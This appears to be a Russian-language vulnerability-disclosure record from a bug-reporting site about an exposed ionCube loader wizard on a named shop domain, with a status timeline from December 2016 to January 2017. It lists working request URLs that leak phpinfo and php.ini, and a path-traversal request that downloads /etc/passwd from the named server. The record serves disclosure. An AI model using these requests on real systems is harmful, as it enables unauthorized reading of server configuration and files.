Подробная информация
Атакующий может получить информацию о phpinfo (), php.ini. Кроме того, есть возможность получить какие-либо файлы сервера.
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpinfo
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpconfig
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpconfig&ininame=../../../../../../../etc/passwd&download=1
Подробная информация: https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/
Записи
-
23 Январь 2017, 13:15
Статус уязвимости
Нет ответа от источника -
15 Декабрь 2016, 11:46
Статус уязвимости
Отправлено сообщение об уязвимости на электронный адрес источника -
14 Декабрь 2016, 13:25
Уязвимости присвоен балл
Модератор присвоил 7 баллов из 10-и на уязвимости -
14 Декабрь 2016, 13:19
Статус уязвимости
Подтверждено со стороны модератора -
12 Декабрь 2016, 02:25
Добавлена уязвимость
Добавлена уязвимость на BUGemot